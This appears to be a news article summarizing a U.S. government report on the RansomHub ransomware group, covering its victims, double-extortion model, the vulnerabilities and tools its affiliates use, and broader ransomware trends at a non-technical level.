The U.S. government recently reported that the RansomHub ransomware group has encrypted and stolen data from over 210 victims since its emergence in February 2024. This group, which operates as a ransomware-as-a-service (RaaS) variant, is a descendant of the Cyclops and Knight variants and has successfully attracted affiliates from other prominent groups like LockBit and ALPHV (BlackCat) following law enforcement crackdowns.

RansomHub’s victims span a wide range of sectors, including critical infrastructure like water, healthcare, transportation, and more. The group uses a double extortion model, where they not only encrypt data but also threaten to release it unless a ransom is paid. Victims who don’t comply have their data published on a leak site for up to 90 days.

The group’s operations are facilitated by exploiting known vulnerabilities in software like Apache ActiveMQ, Atlassian Confluence, and Citrix ADC. Once initial access is gained, affiliates perform reconnaissance using tools such as AngryIPScanner and Nmap, disable antivirus software, and employ various methods to move laterally within networks. They also use tools like Mimikatz to gather credentials and escalate privileges, and employ intermittent encryption to speed up attacks.

RansomHub’s activity has been growing, accounting for a significant portion of global ransomware attacks in 2024, with a notable focus on European organizations. The group also uses a range of tools, including PuTTY and Amazon AWS S3 buckets, to exfiltrate data.

This development highlights a broader trend in ransomware, where attacks have evolved to include complex extortion strategies, such as triple and quadruple extortion. These strategies go beyond data encryption and exfiltration, involving additional threats like DDoS attacks and targeting third-party business partners.

The rise of RaaS models has led to an increase in new ransomware variants and collaborations between criminal groups and nation-state actors, seeking to profit from these illicit activities.